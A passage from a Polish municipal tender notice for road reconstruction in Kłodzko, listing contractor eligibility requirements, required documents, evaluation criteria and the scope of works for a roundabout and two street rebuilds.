b)	minimum dwie roboty budowlane dotycząc budowy lub przebudowy dróg wraz z infrastrukturą podziemną (rurociągi kanalizacji deszczowej i/lub kanalizacji sanitarnej i/lub podziemnych instalacji energii elektrycznej i/lub sieci gazowych i/lub sieci wodociągowych i/lub sieci teletechnicznych) na kwotę nie mniejszą niż 1.500.000,00 zł brutto (słownie: jeden milion pięćset tysięcy złotych i 00/100 groszy brutto) każda. 
Wykazane roboty muszą odpowiadać swoim rodzajem przedmiotowi niniejszego zamówienia. Należy podać wartości oraz daty i miejsca wykonania oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie - referencje wyłącznie od Inwestora wykonanych robót, protokoły odbioru;
6.	Dysponują lub będą dysponować potencjałem technicznym niezbędnym do  wykonania zamówienia.
7.	Dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia oraz posiadającymi kwalifikacje niezbędne do wykonywania zamówienia tj.:
a)	min. 1 kierownikiem budowy z min. 5 letnim doświadczeniem zawodowym, posiadającym uprawnienia budowlane w specjalności drogowej 
b)	min. 1 kierownikiem robót posiadającym uprawnienia budowlane w specjalności drogowej,
c)	min. 1 kierownikiem robót posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych, 
d)	min. 1 kierownikiem robót posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
W/w  osoby winny być członkami właściwej Izby Samorządu Zawodowego oraz posiadać stosowne zaświadczenia.
e)	min. 1 geodetą posiadającym właściwe uprawnienia geodezyjne 
8.	Posiadają środki finansowe lub zdolność kredytową na kwotę  min. 3.000.000,00  zł (trzy miliony  złotych i 00/100 groszy), 
9.	Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę   min. 3.000.000,00  zł (trzy miliony złotych i 00/100 groszy), 
10.	Oświadczą, że spełniają warunki określone w art. 22 PZP oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
11.	Zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust.1 pkt 2, 3, 4, 5,
ust. 2 pkt 1, 5, 5a (jeżeli dotyczy), 6 oraz ust. 3 pkt 2, 3 Rozporządzenia Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane  (Dz. U. Nr 87 z dnia 24 maja 2006 r. poz. 605 z późn. zm.).

	B.1.3. Część III -  Przebudowa ulicy Nadrzecznej w Kłodzku.

O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy:
1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają   obowiązek posiadania takich uprawnień,
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP,
a ponadto:
5.	Wykonali w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie:
a)	minimum trzy roboty budowlane dotyczące budowy i/lub przebudowy dróg wraz z infrastrukturą podziemną (rurociągi kanalizacji deszczowej i/lub kanalizacji sanitarnej i/lub podziemnych instalacji energii elektrycznej i/lub sieci gazowych i/lub sieci wodociągowych i/lub sieci teletechnicznych) o wartości nie mniejszej niż 1.200.000,00 zł brutto (słownie: jeden milion dwieście tysięcy złotych i 00/100 groszy brutto) każda 
lub
b)	minimum dwie roboty budowlane dotycząc budowy lub przebudowy dróg wraz z infrastrukturą podziemną (rurociągi kanalizacji deszczowej i/lub kanalizacji sanitarnej i/lub podziemnych instalacji energii elektrycznej i/lub sieci gazowych i/lub sieci wodociągowych i/lub sieci teletechnicznych) na kwotę nie mniejszą niż 1.800.000,00 zł brutto (słownie: jeden milion osiemset tysięcy złotych i 00/100 groszy brutto) każda. 
Wykazane roboty muszą odpowiadać swoim rodzajem przedmiotowi niniejszego zamówienia. Należy podać wartości oraz daty i miejsca wykonania oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie - referencje wyłącznie od Inwestora wykonanych robót, protokoły odbioru;
6.	Dysponują lub będą dysponować potencjałem technicznym niezbędnym do  wykonania zamówienia.
7.	Dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia oraz posiadającymi kwalifikacje niezbędne do wykonywania zamówienia tj.:
a)	min. 1 kierownikiem budowy z min. 5 letnim doświadczeniem zawodowym, posiadającym uprawnienia budowlane w specjalności drogowej 
b)	min. 1 kierownikiem robót posiadającym uprawnienia budowlane w specjalności drogowej,
c)	min. 1 kierownikiem robót posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych, 
d)	min. 1 kierownikiem robót posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
W/w  osoby winny być członkami właściwej Izby Samorządu Zawodowego oraz posiadać stosowne zaświadczenia.
e)	min. 1 geodetą posiadającym właściwe uprawnienia geodezyjne 
8.	Posiadają środki finansowe lub zdolność kredytową na kwotę  min. 3.500.000,00 zł (trzy milony pięćset tysięcy złotych i 00/100 groszy), 
9.	Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę   min. 3.500.000,00 zł (trzy milony pięćset tysięcy złotych i 00/100 groszy), 
10.	Oświadczą, że spełniają warunki określone w art. 22 PZP oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
11.	Zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust.1 pkt 2, 3, 4, 5,
ust. 2 pkt 1, 5, 5a (jeżeli dotyczy), 6 oraz ust. 3 pkt 2, 3 Rozporządzenia Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane  (Dz. U. Nr 87 z dnia 24 maja 2006 r. poz. 605 z późn. zm.).

	B.2. Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu.
1.	Komisja przetargowa, powołana przez Zamawiającego, dokona oceny spełnienia            warunków udziału w postępowaniu, na podstawie dokumentów i oświadczeń złożonych           w ofercie, potwierdzających spełnienie wymaganych warunków wg zasady spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony i podpisany formularz oferty wg ZAŁĄCZNIKA NR 1 do SIWZ.
2.	Kosztorysy ofertowe, oddzielnie dla branży drogowo - sieciowej i oddzielnie dla budowy oświetlenia. Kosztorysy należy sporządzić metodą kalkulacji uproszczonej. Kosztorysy ofertowe nie będą podlegały ocenie. Zamawiający oczekuje ich przedłożenia jedynie w celu uzyskania ogólnej informacji o sposobie ustalenia ceny przez Wykonawców oraz sporządzenia harmonogramu rzeczowo-finansowego. Harmonogram rzeczowo-finansowy zostanie sporządzony z wybranym Wykonawcą przed podpisaniem umowy.
3.	Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy wg ZAŁĄCZNIKA NR 2 do SIWZ. 
4.	Zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust. 1 pkt. 2, 3, 4, 5 ust. 2 pkt 1, 5, 5a (jeżeli dotyczy), 6 oraz ust. 3 pkt. 2, 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane. (Dz. U. Nr 87 z dnia 24 maja 2006 r. poz. 605 z późn. zm):
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
c)	aktualna informacja z Krajowego Rejestru Karnego  w zakresie określonym w art. 24 ust. 1 pkt 4-8  ustawy , wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
d)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 PZP, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 4 ppkt a, b, d składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości; dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; dokument winien być wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie; dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 4 ppkt c składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 14, 15 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
8.	Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie wg ZAŁĄCZNIKA NR 4 do SIWZ. Referencje lub protokoły końcowego odbioru robót potwierdzające należyte wykonanie robót muszą pochodzić wyłącznie od poprzednich Zamawiających/ Inwestorów. Nie mogą to być dokumenty wystawione przez głównego wykonawcę dla podwykonawcy.
9.	Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, wg ZAŁĄCZNIKA NR 3 do SIWZ,
10.	Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 9, Wykonawca wskazał osoby, którymi będzie dysponował;
11.	Kwalifikacje osób, o których mowa w punktach 9, 10 należy potwierdzić kopiami uprawnień zawodowych oraz zaświadczeniami o przynależności do właściwej Izby Samorządu Zawodowego wraz z adnotacją o aktualnym ubezpieczeniu od odpowiedzialności cywilnej. 
12.	Wykaz części zamówienia, które Wykonawca powierzy podwykonawcom - wzór stanowi załącznik nr 5 (należy określić zakres jak i wartość zleconych prac).
13.	Dowód wniesienia wadium. (wadium musi być wniesione przed upływem terminu składania ofert).
14.	Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
15.	Polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
16.	Zaakceptowany projekt umowy. Projekt umowy powinien zostać zaakceptowany bez dokonywania w nim jakichkolwiek zmian.
17.	Zgodnie z art. 23 ust.1 PZP Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia. W tym przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelkie pełnomocnictwa winny być składane w oryginale lub kopii poświadczonej notarialnie.
18.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, dokumenty wymienione w punkcie 4 winien dołączyć każdy podmiot występujący wspólnie.
19.	W przypadku dołączenia do oferty kopii dokumentu, kopia musi być potwierdzona za zgodność z oryginałem przez Wykonawcę lub pełnomocnego przedstawiciela Wykonawcy. 
20.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
21.	Jeżeli Wykonawca nie złoży wymaganych dokumentów i oświadczeń lub nie spełni jednego bądź więcej warunków, jego oferta zostanie odrzucona lub Wykonawca zostanie wykluczony z postępowania z zastrzeżeniem art. 26 ust. 3 ustawy PZP.
22.	Zgodnie z art. 24 ust. 4 ustawy ofertę Wykonawcy wykluczonego uznaje się 
za odrzuconą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - termin realizacji - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um.klodzko.pl/gospodarka/zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Kłodzku ; pl. B. Chrobrego 1;   57-300 Kłodzko, pok. 226. Opłata za siwz wynosi 400 PLN..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2009 godzina 10:00, miejsce: Urząd Miasta w Kłodzku ; pl. B. Chrobrego 1;   57-300 Kłodzko, pok. 101 - Biuro Obsługi Ludności..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pod nazwą: Podniesienie konkurencyjności regionu Ziemi Kłodzkiej poprzez poprawę jakości gminnych dróg łączących lokalne centra aktywności gospodarczej w mieście Kłodzku z siecią dróg krajowych otrzymał dofinansowanie ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 - działanie 3.1  Infrastruktura drogowa..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa skrzyżowania, na skrzyżowanie o ruchu okrężnym z odcinkami dojazdowymi ulic: Dusznickiej i Objazdowej w Kłodzku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa typowego, czterowlotowego skrzyżowania ulicy Dusznickiej z ulicą Objazdową na skrzyżowanie o ruchu okrężnym z wyspą centralną typu rondo wraz z odcinkami dojazdowymi ww. ulic zgodnie z projektem budowlanym. Zewnętrzna średnica ronda - 32,0 m, szerokość jezdni ronda - 5,0 m, szerokość pierścienia - 2,0 m. Dojazdowe odcinki ulic zaprojektowane są jako skanalizowane z rozdziałem ruchu na jezdnie wylotowe o szerokości 3,5 m i jezdnie wlotowe o szerokości 4,0 m. Na odcinku przebudowy skrzyżowania projekt przewiduje wykonanie chodników o szerokości 2,0 m oraz ciągu pieszo - rowerowego o szerokości 2,5 m. Prace w ciągu ulicy Objazdowej są ściśle związane z II częścią niniejszego postępowania przetargowego. Teren pasa drogowego przyległy do projektowanej przebudowy przewidziany jest do rekultywacji wraz z uzupełnieniem zielenią niską oraz nasadzeniem drzew. 
Do zakresu robót należy:
-	usunięcie drzew i krzewów, kolidujących z inwestycją - Zamawiający przekaże  Wykonawcy zezwolenie na wycinkę drzew,
-	wykonanie pomiarów geodezyjnych, również powykonawczych,
-	wykonanie prac rozbiórkowych istniejących nawierzchni jezdni i zjazdu - kostkę betonową z wysepek rozdzielających należy ułożyć na paletach i złożyć w miejscu wskazanym przez Zamawiającego - odległość do 3 km,
-	przebudowa zjazdu kolidującego z inwestycją,
-	przebudowa kolizji energetycznych i telekomunikacyjnych,
-	budowa kanalizacji deszczowej,
-	czyszczenie i profilowanie rowów odwadniających,
-	regulacja istniejących studni infrastruktury podziemnej,
-	budowy oświetlenia drogowego - oprawy oświetleniowe ze zdemontowanych słupów oświetleniowych i zdemomtowane słupy należy złożyć w miejscu wskazanym przez Zamawiającego - odległość do 3 km,
-	budowa muru oporowego,
-	wykonanie nawierzchni jezdni, chodników,
-	wykonanie oznakowania poziomego i pionowego - zgodnie z posiadanym przez Zamawiającego i zatwierdzonym projektem stałej organizacji ruchu,
-	humusowanie, zasianie trawy i zasadzenie drzew.
	Na czas wykonywania robót Wykonawca jest zobowiązany opracować, uzyskać zatwierdzenie i wprowadzić projekt czasowej organizacji ruchu drogowego. Zamawiający dopuszcza na czas realizacji inwestycji całkowite wyłączenie z ruchu przedmiotowego skrzyżowania z następującym zastrzeżeniem:
-	przez cały czas trwania inwestycji należy zapewnić dojazd do firmy Agrol Sp.j., ul. Objazdowa 1.
Ponadto należy pamiętać, że budowa ronda będzie odbywać się w tym samym czasie, co prace związane z przebudową ulicy Objazdowej, które są przedmiotem drugiej części niniejszego zamówienia - A.3.2.	
Prace należy wykonać zgodnie z posiadanymi przez Zamawiającego projektami technicznymi poszczególnych branż. Dokumentacja techniczna stanowi integralną część SIWZ z zastrzeżeniem, że wszystkie ewentualnie wskazane z nazwy materiały (wyroby) należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że zgodnie z art. 29 ustawy, na wskazane z nazwy materiały i wyroby Zamawiający dopuszcza zastosowanie równoważnych materiałów (wyrobów), nie gorszej jakości niż opisane w projekcie i specyfikacji technicznej wykonania i odbioru robót. Ciężar udowodnienia, że materiał (wyrób) jest równoważny w stosunku do wymogu określonego przez Zamawiającego spoczywa na składającym ofertę. W takim wypadku Wykonawca musi przedłożyć odpowiednie dokumenty opisujące parametry techniczne, wymagane prawem certyfikaty i inne dokumenty dopuszczające dane materiały (wyroby) do użytkowania, oraz pozwalające jednoznacznie stwierdzić, że są one rzeczywiście równoważne. Szczegółowy zakres i technologię wykonania i odbioru robót określają: 
-	projekty,
-	specyfikacje techniczne wykonania i odbioru robót,
-	przedmiary robót (ze względu na wynagrodzenie ryczałtowe za wykonanie zamówienia przedmiary robót wykonane i dostarczone przez Zamawiającego są jedynie dodatkową podstawą informacyjną - patrz rozdziały C, D niniejszej SIWZ),
stanowiące załączniki do niniejszej SIWZ.
	
Wykonawcy za realizację Zamówienia przysługiwać będzie wynagrodzenie ryczałtowe - patrz rozdział D.
Wszelkie koszty związane z realizacją przedmiotu zamówienia obciążają Wykonawcę. 
Wykonawca jest zobowiązany udzielić na powyższe prace gwarancji na min. 36 miesięcy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.28-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. termin realizacji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa ulicy Objazdowej w Kłodzku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa ulicy Objazdowej na długości 930,66 m pomiędzy skrzyżowaniem z ul. Noworudzką (połączenie z przebudowanym odcinkiem dojazdowym do istniejącego ronda), a skrzyżowaniem z ul. Dusznicką (połączenie z odcinkiem dojazdowym do ronda, którego budowa jest przedmiotem pierwszej części niniejszego zamówienia - A.3.1.). Na odcinku przebudowy ulicy Objazdowej zaprojektowano: 
-	chodniki o szerokości 2,0 m, 
-	ciąg pieszo - rowerowy o szerokości 2,5 m. 
Powyższe elemeny pasa drogowego oddzielone będą od jezdni pasami zieleni niskiej o szerokości od 0,8 do 4,8 m. 
	Na odcinku od skrzyżowania z ul. Zajęczą do skrzyżowania z ul. Noworudzką przewidziano wykonanie w pasie drogowym: 
-	zatok postojowych do parkowania równoległego do osi jezdni o szerkości 2,5 m oraz do parkowania skośnego do osi jezdni o szerokości 5,0 m,
-	dwóch zatok autobusowych. 
Teren pasa drogowego przyległy do projektowanej przebudowy przewidziany jest do rekultywacji wraz z uzupełnieniem zielenią niską oraz nasadzeniem drzew jarząb szwedzki. Na odcinku od 0+782 do 0+927 zaprojektowano umocnienie skarpy gabionami 1,0x2,0x0,5, długość 146,0 m i wysokość do 3,0 m.  
Inwestycja obejmuje również:
-	przebudowę skrzyżowania ulicy Objazdowej z ulicą Zajęczą wraz odcinkami dojazdowymi ulicy Zajęczej do tego skrzyżowania,
-	budowę kanalizacji deszczowej,
-	budowę oświetlenia ulicznego.
Do zakresu robót należy:
-	wykonanie projektu organizacji ruchu na czas trwania inwestycji, uzyskanie zatwierdzenia, a następnie jego wprowadzenie i utrzymanie oznakowania w trakcie robót - w projekcie należy wskazać sposób obsługi komunikacyjnej posesji korzystających obecnie ze zjazdów z ul. Objazdowej,
-	wycinka drzew, karczowanie pni - Zamawiający przekaże Wykonawcy zezwolenie na wycinkę drzew,
-	wykonanie pomiarów geodezyjnych, również powykonawczych,
-	wykonanie prac rozbiórkowych istniejących nawierzchni jezdni i zjazdów,
-	przebudowa zjazdów, 
-	przebudowa kolizji energetycznych i telekomunikacyjnych,
-	budowa kanalizacji deszczowej: rury pcv o średnicy: 200 mm - 443mb, 300 mm - 243 mb, 400 - 193 mb, 500 mm - 190 mb, 600 mm - 33 mb, separtor o średnicy 2000 mm, osadnik o średnicy 2500 mm, studnie kanalizacyjne o średnicy  1500 mm - 10 szt,. 1250 mm - 16 szt., 2000 mm - 1 szt., studzienki ściekowe o średnicy 500 mm z pojedyńczym wpustem i osadnikiem - 29 szt.,
-	regulacja istniejących studni infrastruktury podziemnej,
-	budowy oświetlenia drogowego: kabel YAKY 4x25 mm2 w rurzee osłonowej Arota 75, 36 szt. punktów oświetleniowych, słupy stalowe ocynkowane 8 m na fundamentach prefabrykowanych  - oprawy oświetleniowe ze zdemontowanych słupów oświetleniowych i zdemomtowane słupy należy złożyć w miejscu wskazanym przez Zamawiającego - odległość do 3 km,
-	wykonanie nawierzchni jezdni, chodników i ciągu pieszo - rowerowego,
-	umocnienie skarpy gabionami,
-	wykonanie oznakowania poziomego i pionowego - zgodnie z posiadanym przez Zamawiającego i zatwierdzonym projektem stałej organizacji ruchu,
-	humusowanie, zasianie trawy i zasadzenie drzew.
Inwestycję planuje się zrealizować w dwóch etapach:
I etap	- przebudowa ulicy Objazdowej od 0+000,00 km (początek opracowania), do 0+416,87 km,
etap ten obejmuje przebudowę skrzyżowania z ul. Zajęczą, etap ten będzie realizowany w tym samym czasie, co budowa ronda na skrzyżowaniu ulic: Objazdowa, Dusznicka A.3.1., co należy również uwzględnić w projekcie organizacji ruchu na czas robót,
II etap 	- przebudowa ulicy Objazdowej od  0+416,87 km do 0+930,66 km (koniec opracowania, włączenie do istniejącej nawierzchni).

Prace należy wykonać zgodnie z posiadanymi przez Zamawiającego projektami technicznymi poszczególnych branż. Dokumentacja techniczna stanowi integralną część SIWZ z zastrzeżeniem, że wszystkie ewentualnie wskazane z nazwy materiały (wyroby) należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że zgodnie z art. 29 ustawy, na wskazane z nazwy materiały i wyroby Zamawiający dopuszcza zastosowanie równoważnych materiałów (wyrobów), nie gorszej jakości niż opisane w projekcie i specyfikacji technicznej wykonania i odbioru robót. Ciężar udowodnienia, że materiał (wyrób) jest równoważny w stosunku do wymogu określonego przez Zamawiającego spoczywa na składającym ofertę. W takim wypadku Wykonawca musi przedłożyć odpowiednie dokumenty opisujące parametry techniczne, wymagane prawem certyfikaty i inne dokumenty dopuszczające dane materiały (wyroby) do użytkowania, oraz pozwalające jednoznacznie stwierdzić, że są one rzeczywiście równoważne. Szczegółowy zakres i technologię wykonania i odbioru robót określają: 
-	projekty,
-	specyfikacje techniczne wykonania i odbioru robót,
-	przedmiary robót (ze względu na wynagrodzenie ryczałtowe za wykonanie zamówienia przedmiary robót wykonane i dostarczone przez Zamawiającego są jedynie dodatkową podstawą informacyjną - patrz rozdziały C, D niniejszej SIWZ),
stanowiące załączniki do niniejszej SIWZ.
	
Wykonawcy za realizację Zamówienia przysługiwać będzie wynagrodzenie ryczałtowe - patrz rozdział D.
Wszelkie koszty związane z realizacją przedmiotu zamówienia obciążają Wykonawcę. 
Wykonawca jest zobowiązany udzielić na powyższe prace gwarancji na min. 36 miesięcy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa ulicy Nadrzecznej w Kłodzku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa ulicy Nadrzecznej o długości 953 m. początek przebudowy znajduje się w linii końcowej zabudowy klasztornej Sióstr Klarysek od Wieczystej Adoracji, a koniec na skrzyżowaniu z ulicami: Nowy Świat, Półwiejska. Oprócz przebudowy konstrukcji jezdni (poszerzenie jezdni, wykonanie nowych chodników) w zakres inwestycji wchodzą: 
-	zabezpieczenia zagrożonych odcinków skarpy korpusu drogowego od strony doliny rzeki Nysy Kłodzkiej - żelbetowa konstrukcja oparta na palach, 
-	konstrukcja odciążająca istniejący mur oporowy przy budynku mieszkalnym nr 4 - konstrukcja żelbetowa wykonana wewnątrz korpusu drogowego,
-	zabezpieczenia części skarpy naruszonej w wyniku poszerzenia ulicy - kosze gabionowe. 
Ponadto w ramach inwestycji wykonane zostaną:
-	przebudowa istniejącej kanalizacji deszczowej
-	budowa odcinka nowej kanalizacji deszczowej,
-	przebudowa podziemnej infrastruktury energetycznej i teletechnicznej,
-	budowa nowego oświetlenia ulicznego.
Do zakresu robót należy:
-	usunięcie drzew i krzewów, kolidujących z inwestycją - Zamawiający przekaże  Wykonawcy zezwolenie na wycinkę drzew,
-	wykonanie pomiarów geodezyjnych, również powykonawczych,
-	wykonanie prac rozbiórkowych istniejących nawierzchni jezdni i zjazdów kolidujących z inwestycją - kostę kamienną należy złożyć w workach typu big - bag, krawężniki kamienne na paletach i odwieżć w miejsce wskazane przez Zamawiającego - odległość do 1 km,
-	przebudowa zjazdów,
-	przebudowa kolizji energetycznych i telekomunikacyjnych,
	budowa kanalizacji deszczowej,
-	regulacja istniejących studni infrastruktury podziemnej,
-	budowy oświetlenia drogowego  - oprawy oświetleniowe ze zdemontowanych słupów oświetleniowych i zdemontowane słupy należy złożyć w miejscu wskazanym przez Zamawiającego - odległość do 1 km,
-	budowa muru oporowego,
-	wykonanie nawierzchni jezdni, chodników,

Inwestycję planuje się zrealizować w dwóch etapach:
I etap	- przebudowa ulicy Nadrzecznej od 0+710,14 m do 0+957,34 m (koniec opracowania, skrzyżowanie z ul. Nowy Świat i ul. Półwiejską)
Uwaga: jest to etap, w którym konieczne będzie wykonanie większości konstrukcji wzmacniających tj:
-	zabezpieczenia zagrożonych odcinków skarpy korpusu drogowego od strony doliny rzeki Nysy Kłodzkiej - żelbetowa konstrukcja oparta na palach, 
